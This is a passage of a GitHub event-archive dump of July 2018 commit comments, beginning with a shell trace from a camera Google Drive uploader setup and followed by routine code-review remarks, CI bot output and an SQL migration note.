/tmp/sd/gdrive/yi-hack-v3/bin/busybox-1.28.1 /tmp/sd/gdrive/yi-hack-v3/bin/curl /tmp/sd/yi-hack-v3/bin/\r\n+ rm /bin/egrep\r\n+ rm /bin/expr\r\n+ rm /bin/stat\r\n+ rm /bin/wc\r\n+ ln -s /tmp/sd/yi-hack-v3/bin/busybox-1.28.1 /bin/egrep\r\n+ ln -s /tmp/sd/yi-hack-v3/bin/busybox-1.28.1 /bin/expr\r\n+ ln -s /tmp/sd/yi-hack-v3/bin/busybox-1.28.1 /bin/stat\r\n+ ln -s /tmp/sd/yi-hack-v3/bin/busybox-1.28.1 /bin/wc\r\n+ sed -e s/sh \\/tmp\\/sd\\/gdrive\\/GDrive\\(Uploader\\|Autoremover\\)//g -i /tmp/sd/yi-hack-v3/startup.sh\r\n+ echo sh /tmp/sd/gdrive/GDriveUploader\r\n+ echo sh /tmp/sd/gdrive/GDriveAutoremover\r\n+ [ -f /tmp/sd/gdrive/gdrive_folder.index ]\r\n+ [ -f /tmp/sd/gdrive/gdrive_file.index ]\r\n+ configure\r\n+ echo Enter your Client ID:\r\nEnter your Client ID:\r\n+ read client_id\r\nxxxx\r\n+ echo Enter your Client secret:\r\nEnter your Client secret:\r\n+ read client_secret\r\nxxxx\r\n+ echo\r\n\r\n+ echo Put this link into your browser:\r\nPut this link into your browser:\r\n+ echo xxxx\r\nxxxx\r\n+ echo\r\n\r\n+ echo Copy and paste your code here:\r\nCopy and paste your code here:\r\n+ [ 1 ]\r\n+ read code\r\nyyyy\r\n+ curl --insecure -H Host: www.googleapis.com -H Content-Type: application/x-www-form-urlencoded -d code=yyyy&client_id=xxxx.apps.googleusercontent.com&client_secret=xxx&redirect_uri=urn:ietf:wg:oauth:2.0:oob&grant_type=authorization_code -o /tmp/sd/gdrive/conf/response https://www.googleapis.com/oauth2/v4/token\r\nIllegal instruction\r\n+ grep -q refresh_token /tmp/sd/gdrive/conf/response\r\n+ grep -q access_token /tmp/sd/gdrive/conf/response\r\ngrep: /tmp/sd/gdrive/conf/response: No such file or directory\r\ngrep: /tmp/sd/gdrive/conf/response: No such file or directory\r\n+ echo Your code was expired or it is not correct. Please refresh a link in your\r\nbrowser and enter a new valid code:\r\nYour code was expired or it is not correct. Please refresh a link in your browser and enter a new valid code:`"}},"created_at":"2018-07-02T08:43:58Z"}
{"id":"7905284622","type":"CommitCommentEvent","actor":{"login":"WhySRZ"},"repo":{"name":"amosxb/SmallRest"},"payload":{"comment":{"id":29562965,"position":null,"line":null,"path":null,"commit_id":"f1d1156848f4d0a47031a801914207f65b0e0b93","created_at":"2018-07-02T08:45:10Z","updated_at":"2018-07-02T08:45:10Z","author_association":"NONE","body":"测试提交"}},"created_at":"2018-07-02T08:45:10Z"}
{"id":"7905293685","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Alexpux/MSYS2-packages"},"payload":{"comment":{"id":29562997,"position":47,"line":41,"path":"pinentry/PKGBUILD","commit_id":"fec6c02e355217bd3aa4cf95df6dc03686f2fd3c","created_at":"2018-07-02T08:47:03Z","updated_at":"2018-07-02T08:47:03Z","author_association":"NONE","body":"I wonder why did you disable `tty` and `curses` versions of pinentry? :disappointed: Now I have to use GUI version of the program. That is very annoying and disappointing :cry:\r\nCan we get `tty` version back, please? :pray:"}},"created_at":"2018-07-02T08:47:03Z"}
{"id":"7905294183","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29563002,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-02T08:47:10Z","updated_at":"2018-07-02T08:47:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T08:47:10Z"}
{"id":"7905297236","type":"CommitCommentEvent","actor":{"login":"michaelatmender"},"repo":{"name":"mendersoftware/gui"},"payload":{"comment":{"id":29563014,"position":6,"line":97,"path":"src/js/components/help/connecting-devices/raspberry-pi-3.js","commit_id":"c69b2ffde29709c14cf28caa649272357ea70094","created_at":"2018-07-02T08:47:45Z","updated_at":"2018-07-02T08:47:45Z","author_association":"MEMBER","body":"@oleorhagen Should this link rather be for the \"Wifi connectivity\" section? (https://docs.mender.io/development/getting-started/deploy-to-physical-devices#wifi-connectivity)"}},"created_at":"2018-07-02T08:47:45Z"}
{"id":"7905297452","type":"CommitCommentEvent","actor":{"login":"roy1018"},"repo":{"name":"roy1018/iCAP"},"payload":{"comment":{"id":29563018,"position":null,"line":null,"path":null,"commit_id":"f8eb9d62f6545b4f08705e8ed2651c650e132b48","created_at":"2018-07-02T08:47:48Z","updated_at":"2018-07-02T08:47:48Z","author_association":"OWNER","body":"This text is **bold.**"}},"created_at":"2018-07-02T08:47:48Z"}
{"id":"7905297739","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29563019,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-02T08:47:52Z","updated_at":"2018-07-02T08:47:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T08:47:52Z"}
{"id":"7905300632","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563024,"position":4,"line":4,"path":"server/handlers/api/v1/auth/controllers/sign-in.js","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:48:28Z","updated_at":"2018-07-02T08:48:28Z","author_association":"NONE","body":"Деструктуризацию ctx не любите использовать? :)"}},"created_at":"2018-07-02T08:48:28Z"}
{"id":"7905302878","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563029,"position":1,"line":15,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/listeners/TestcaseStateListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:48:55Z","updated_at":"2018-07-02T08:48:55Z","author_association":"OWNER","body":"This whole class must be checked"}},"created_at":"2018-07-02T08:48:55Z"}
{"id":"7905303489","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563030,"position":10,"line":10,"path":"server/handlers/api/v1/auth/credentials.js","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:49:03Z","updated_at":"2018-07-02T08:49:03Z","author_association":"NONE","body":"Ну и тут можно .find, как ниже используется"}},"created_at":"2018-07-02T08:49:03Z"}
{"id":"7905303924","type":"CommitCommentEvent","actor":{"login":"Alexpux"},"repo":{"name":"Alexpux/MSYS2-packages"},"payload":{"comment":{"id":29563031,"position":47,"line":41,"path":"pinentry/PKGBUILD","commit_id":"fec6c02e355217bd3aa4cf95df6dc03686f2fd3c","created_at":"2018-07-02T08:49:09Z","updated_at":"2018-07-02T08:49:09Z","author_association":"OWNER","body":"TTY version not working for me that is why i disable it"}},"created_at":"2018-07-02T08:49:09Z"}
{"id":"7905305543","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563032,"position":32,"line":32,"path":"server/handlers/api/v1/auth/credentials.js","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:49:29Z","updated_at":"2018-07-02T08:49:29Z","author_association":"NONE","body":"И тут"}},"created_at":"2018-07-02T08:49:29Z"}
{"id":"7905306568","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29563035,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-02T08:49:41Z","updated_at":"2018-07-02T08:49:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T08:49:41Z"}
{"id":"7905307841","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/paizsvirag"},"payload":{"comment":{"id":29563039,"position":null,"line":null,"path":null,"commit_id":"55f69b0beb5ba6c005137878467f645a6e42b9f9","created_at":"2018-07-02T08:49:56Z","updated_at":"2018-07-02T08:49:56Z","author_association":"NONE","body":"nice "}},"created_at":"2018-07-02T08:49:56Z"}
{"id":"7905308037","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563041,"position":1,"line":1,"path":"server/handlers/api/v1/users/controllers/get-user-by-id.js","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:49:59Z","updated_at":"2018-07-02T08:49:59Z","author_association":"NONE","body":"Почему и удобнее от алиаса сверху писать, не будет получаться код-морзе :)"}},"created_at":"2018-07-02T08:49:59Z"}
{"id":"7905313264","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563052,"position":1,"line":1,"path":"agent/webapps/server/src/main/config/swagger/templates/markdown.hbs","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:50:58Z","updated_at":"2018-07-02T08:50:58Z","author_association":"OWNER","body":"Delete this file"}},"created_at":"2018-07-02T08:50:58Z"}
{"id":"7905314244","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563053,"position":1,"line":1,"path":"agent/webapps/server/src/main/config/swagger/templates/operation.hbs","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:51:10Z","updated_at":"2018-07-02T08:51:10Z","author_association":"OWNER","body":"Delete this file"}},"created_at":"2018-07-02T08:51:10Z"}
{"id":"7905314657","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563054,"position":10,"line":10,"path":"src/App.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:51:15Z","updated_at":"2018-07-02T08:51:15Z","author_association":"NONE","body":"Если везде один и тот же класс добавляется, то неудобно каждый раз писать. Но можно через конфигурацию роутера поменять класс по умолчанию"}},"created_at":"2018-07-02T08:51:15Z"}
{"id":"7905319845","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29563065,"position":null,"line":null,"path":null,"commit_id":"dafca14275a9973db6574cfbd14c87b123919e09","created_at":"2018-07-02T08:52:18Z","updated_at":"2018-07-02T08:52:18Z","author_association":"NONE","body":"i dont remember"}},"created_at":"2018-07-02T08:52:18Z"}
{"id":"7905320445","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/paizsvirag"},"payload":{"comment":{"id":29563067,"position":null,"line":null,"path":null,"commit_id":"6e85ff88de3be6add11b9a2517e150da3e8555da","created_at":"2018-07-02T08:52:25Z","updated_at":"2018-07-02T08:52:25Z","author_association":"NONE","body":"a lot of missing semicolon after res.json, please pay attention to them :) "}},"created_at":"2018-07-02T08:52:25Z"}
{"id":"7905321016","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563070,"position":1,"line":1,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/agentservice/AgentWsImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:52:33Z","updated_at":"2018-07-02T08:52:33Z","author_association":"OWNER","body":"It must be checked if new code is presented in this file on the master branch"}},"created_at":"2018-07-02T08:52:33Z"}
{"id":"7905321451","type":"CommitCommentEvent","actor":{"login":"nafiesl"},"repo":{"name":"nafiesl/free-pmo"},"payload":{"comment":{"id":29563072,"position":null,"line":null,"path":null,"commit_id":"26fbc2a9505bfa75a6b3c6275d008cb18f3ecc62","created_at":"2018-07-02T08:52:37Z","updated_at":"2018-07-02T08:52:37Z","author_association":"OWNER","body":"This commit contains change on `jobs` and `tasks` table, for existing Free-PMO users, please use this sql command to update your tables.\r\n\r\n```sql\r\nALTER TABLE `jobs`\r\n\tCHANGE COLUMN `position` `position` TINYINT(3) NOT NULL DEFAULT '0' AFTER `type_id`,\r\n\tADD COLUMN `target_start_date` DATE NULL DEFAULT NULL AFTER `position`,\r\n\tADD COLUMN `target_end_date` DATE NULL DEFAULT NULL AFTER `target_start_date`,\r\n\tADD COLUMN `actual_start_date` DATE NULL DEFAULT NULL AFTER `target_end_date`,\r\n\tADD COLUMN `actual_end_date` DATE NULL DEFAULT NULL AFTER `actual_start_date`;\r\n\t\r\nALTER TABLE `tasks`\r\n\tCHANGE COLUMN `progress` `progress` TINYINT(3) NOT NULL DEFAULT '0' AFTER `description`,\r\n\tCHANGE COLUMN `position` `position` TINYINT(3) NOT NULL DEFAULT '0' AFTER `progress`;\r\n```\r\n\r\nThanks."}},"created_at":"2018-07-02T08:52:37Z"}
{"id":"7905322418","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29563074,"position":null,"line":null,"path":null,"commit_id":"dafca14275a9973db6574cfbd14c87b123919e09","created_at":"2018-07-02T08:52:48Z","updated_at":"2018-07-02T08:52:48Z","author_association":"NONE","body":"i dont remember"}},"created_at":"2018-07-02T08:52:48Z"}
{"id":"7905322647","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563076,"position":31,"line":60,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/AgentConfigurationServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:52:51Z","updated_at":"2018-07-02T08:52:51Z","author_association":"OWNER","body":"This line must be kept"}},"created_at":"2018-07-02T08:52:51Z"}
{"id":"7905325376","type":"CommitCommentEvent","actor":{"login":"stadia"},"repo":{"name":"crowd-ai/activerecord-mysql2rgeo-adapter"},"payload":{"comment":{"id":29563077,"position":null,"line":null,"path":null,"commit_id":"4a4e4348714d7d67dc3dae7a40dd7728d45ae67c","created_at":"2018-07-02T08:53:23Z","updated_at":"2018-07-02T08:53:23Z","author_association":"NONE","body":"great!\r\nplease, pr to my repo\r\n"}},"created_at":"2018-07-02T08:53:23Z"}
{"id":"7905325491","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563078,"position":10,"line":10,"path":"src/components/NotAuth.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:53:25Z","updated_at":"2018-07-02T08:53:25Z","author_association":"NONE","body":"Обычно если есть ссылка, у которой делают preventDefault стоит обдумать вариант замены ее на button"}},"created_at":"2018-07-02T08:53:25Z"}
{"id":"7905326942","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/paizsvirag"},"payload":{"comment":{"id":29563081,"position":3,"line":3,"path":"week-07/day-02/callback/multiple-timeout.js","commit_id":"55e6f31bf98bb9425ee83e0ffa1b5acce6e60195","created_at":"2018-07-02T08:53:43Z","updated_at":"2018-07-02T08:53:43Z","author_association":"NONE","body":"arrow function, fuck yesssss 🥇 "}},"created_at":"2018-07-02T08:53:43Z"}
{"id":"7905330642","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"exoscale/egoscale"},"payload":{"comment":{"id":29563089,"position":null,"line":null,"path":null,"commit_id":"eb9baabb7d10f4d2365fc67d582efc2b5c74d629","created_at":"2018-07-02T08:54:27Z","updated_at":"2018-07-02T08:54:27Z","author_association":"MEMBER","body":":+1:"}},"created_at":"2018-07-02T08:54:27Z"}
{"id":"7905330891","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563090,"position":71,"line":99,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/AgentConfigurationServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:54:30Z","updated_at":"2018-07-02T08:54:30Z","author_association":"OWNER","body":"Check this line"}},"created_at":"2018-07-02T08:54:30Z"}
{"id":"7905332366","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/paizsvirag"},"payload":{"comment":{"id":29563093,"position":5,"line":5,"path":"week-07/day-03/bookstore_1/script.js","commit_id":"8713dbec4c64b1b018e996cc100261b298353794","created_at":"2018-07-02T08:54:48Z","updated_at":"2018-07-02T08:54:48Z","author_association":"NONE","body":"`http://localhost:3000` should be in a separate variable :) "}},"created_at":"2018-07-02T08:54:48Z"}
{"id":"7905334210","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29563099,"position":null,"line":null,"path":null,"commit_id":"dafca14275a9973db6574cfbd14c87b123919e09","created_at":"2018-07-02T08:55:10Z","updated_at":"2018-07-02T08:55:10Z","author_association":"CONTRIBUTOR","body":"oh well I can see why..."}},"created_at":"2018-07-02T08:55:10Z"}
{"id":"7905336893","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563114,"position":172,"line":262,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/AgentConfigurationServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:55:42Z","updated_at":"2018-07-02T08:55:42Z","author_association":"OWNER","body":"Keep this"}},"created_at":"2018-07-02T08:55:42Z"}
{"id":"7905337628","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/paizsvirag"},"payload":{"comment":{"id":29563116,"position":null,"line":null,"path":null,"commit_id":"8713dbec4c64b1b018e996cc100261b298353794","created_at":"2018-07-02T08:55:51Z","updated_at":"2018-07-02T08:55:51Z","author_association":"NONE","body":"please add the .env file to your gitignore, because now i can see all of your infos about your mysql server"}},"created_at":"2018-07-02T08:55:51Z"}
{"id":"7905337703","type":"CommitCommentEvent","actor":{"login":"ledettwy"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29563117,"position":null,"line":null,"path":null,"commit_id":"c811c35b9cd6a8a0832baa009f900c88fa0c350a","created_at":"2018-07-02T08:55:51Z","updated_at":"2018-07-02T08:55:51Z","author_association":"NONE","body":"This change makes me very sad ): other packages that use vmTools in their release.nix could have used those too!!!\r\n\r\nCan this be reverted?"}},"created_at":"2018-07-02T08:55:51Z"}
{"id":"7905339003","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563120,"position":202,"line":310,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/AgentConfigurationServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:56:08Z","updated_at":"2018-07-02T08:56:08Z","author_association":"OWNER","body":"check this line"}},"created_at":"2018-07-02T08:56:08Z"}
{"id":"7905341827","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563126,"position":17,"line":38,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/BaseRestServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:56:39Z","updated_at":"2018-07-02T08:56:39Z","author_association":"OWNER","body":"Keep this line"}},"created_at":"2018-07-02T08:56:39Z"}
{"id":"7905342147","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29563127,"position":null,"line":null,"path":null,"commit_id":"dafca14275a9973db6574cfbd14c87b123919e09","created_at":"2018-07-02T08:56:42Z","updated_at":"2018-07-02T08:56:42Z","author_association":"NONE","body":"should i stub it again"}},"created_at":"2018-07-02T08:56:42Z"}
{"id":"7905342730","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563130,"position":3,"line":3,"path":"src/components/SignInForm.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:56:48Z","updated_at":"2018-07-02T08:56:48Z","author_association":"NONE","body":"Это конечно дело вкуса, но методы мне кажется удобнее называть более приближенно к логике которую выполняют, чем моменты когда они вызываются"}},"created_at":"2018-07-02T08:56:48Z"}
{"id":"7905343127","type":"CommitCommentEvent","actor":{"login":"michaelatmender"},"repo":{"name":"mendersoftware/gui"},"payload":{"comment":{"id":29563131,"position":null,"line":null,"path":null,"commit_id":"c69b2ffde29709c14cf28caa649272357ea70094","created_at":"2018-07-02T08:56:53Z","updated_at":"2018-07-02T08:56:53Z","author_association":"MEMBER","body":"@oleorhagen These links were not quite implemented correctly, I had to make a few adjustments. Check out https://github.com/mendersoftware/gui/pull/364 for future reference for how to create links in the Help section"}},"created_at":"2018-07-02T08:56:53Z"}
{"id":"7905343606","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29563133,"position":null,"line":null,"path":null,"commit_id":"dafca14275a9973db6574cfbd14c87b123919e09","created_at":"2018-07-02T08:57:00Z","updated_at":"2018-07-02T08:57:00Z","author_association":"CONTRIBUTOR","body":"no"}},"created_at":"2018-07-02T08:57:00Z"}
{"id":"7905344796","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29563136,"position":null,"line":null,"path":null,"commit_id":"dafca14275a9973db6574cfbd14c87b123919e09","created_at":"2018-07-02T08:57:15Z","updated_at":"2018-07-02T08:57:15Z","author_association":"NONE","body":"why not"}},"created_at":"2018-07-02T08:57:15Z"}
{"id":"7905346665","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/paizsvirag"},"payload":{"comment":{"id":29563141,"position":31,"line":46,"path":"week-07/reddit/server.js","commit_id":"c162195d700eae05d3352b6aab9b61761cedc438","created_at":"2018-07-02T08:57:37Z","updated_at":"2018-07-02T08:57:37Z","author_association":"NONE","body":"the timestamp is automaticly working, and if you add a default value to the score, you don't have to write them into the sql query , just the title and the url"}},"created_at":"2018-07-02T08:57:37Z"}
{"id":"7905347728","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563145,"position":58,"line":58,"path":"src/components/SignInForm.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:57:50Z","updated_at":"2018-07-02T08:57:50Z","author_association":"NONE","body":"В метод удобнее передавать уже само значение. В шаблоне будет onInputLogin($event.taget.value), зато тут мы получим достаточно простой метод, который и протестировать будет легче"}},"created_at":"2018-07-02T08:57:50Z"}
{"id":"7905350659","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/paizsvirag"},"payload":{"comment":{"id":29563149,"position":58,"line":82,"path":"week-07/reddit/server.js","commit_id":"7ffa0a3e2d4a6df643662ce530781f6594bf12fc","created_at":"2018-07-02T08:58:25Z","updated_at":"2018-07-02T08:58:25Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T08:58:25Z"}
{"id":"7905353804","type":"CommitCommentEvent","actor":{"login":"SEEYOULHATER"},"repo":{"name":"Nicolas-Hermet/THP_S01_Lundi"},"payload":{"comment":{"id":29563158,"position":null,"line":null,"path":null,"commit_id":"40d1662a8a847a8a2e5e64f852a61cb4ac5bca3e","created_at":"2018-07-02T08:59:03Z","updated_at":"2018-07-02T08:59:03Z","author_association":"NONE","body":"le vrai de vrai arrive attends!"}},"created_at":"2018-07-02T08:59:03Z"}
{"id":"7905354292","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563162,"position":13,"line":13,"path":"week -2(Orientation)/day4/FoxClub/FoxClub/Controllers/FoxClubController.cs","commit_id":"c9448fbd17e77e8084950df04bea7b5f6c1dfb2d","created_at":"2018-07-02T08:59:10Z","updated_at":"2018-07-02T08:59:10Z","author_association":"NONE","body":"This field can be private"}},"created_at":"2018-07-02T08:59:10Z"}
{"id":"7905355434","type":"CommitCommentEvent","actor":{"login":"KeshavAdityaRP"},"repo":{"name":"PromoterPredict/PromoterStrengthPredictor"},"payload":{"comment":{"id":29563168,"position":null,"line":null,"path":null,"commit_id":"f3228b2c17e63ffdf373701b1b3ae463b1a8e703","created_at":"2018-07-02T08:59:24Z","updated_at":"2018-07-02T08:59:24Z","author_association":"CONTRIBUTOR","body":"Changes Noted"}},"created_at":"2018-07-02T08:59:24Z"}
{"id":"7905356170","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563170,"position":33,"line":33,"path":"week -2(Orientation)/day4/FoxClub/FoxClub/Controllers/FoxClubController.cs","commit_id":"c9448fbd17e77e8084950df04bea7b5f6c1dfb2d","created_at":"2018-07-02T08:59:32Z","updated_at":"2018-07-02T08:59:32Z","author_association":"NONE","body":"Unnecessary empty line"}},"created_at":"2018-07-02T08:59:32Z"}
{"id":"7905358012","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563174,"position":6,"line":6,"path":"src/services/check-auth.ts","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T08:59:54Z","updated_at":"2018-07-02T08:59:54Z","author_association":"NONE","body":"Адрес API сервера удобнее все-таки выносить в какой-нибудь конфиг, где определять дефолтное значение и возможно добавить переопределение переменными окружения"}},"created_at":"2018-07-02T08:59:54Z"}
{"id":"7905358178","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563176,"position":15,"line":15,"path":"week -2(Orientation)/day4/FoxClub/FoxClub/Controllers/HomeController.cs","commit_id":"c9448fbd17e77e8084950df04bea7b5f6c1dfb2d","created_at":"2018-07-02T08:59:56Z","updated_at":"2018-07-02T08:59:56Z","author_association":"NONE","body":"This can be private too"}},"created_at":"2018-07-02T08:59:56Z"}
{"id":"7905359978","type":"CommitCommentEvent","actor":{"login":"xxzbg"},"repo":{"name":"sffxzzp/Steam-2018-SummerGame"},"payload":{"comment":{"id":29563187,"position":null,"line":null,"path":null,"commit_id":"f634d900090bb66482a7b5b70150efd335f5facf","created_at":"2018-07-02T09:00:17Z","updated_at":"2018-07-02T09:00:17Z","author_association":"NONE","body":"确实是不会失败了..   0.0"}},"created_at":"2018-07-02T09:00:17Z"}
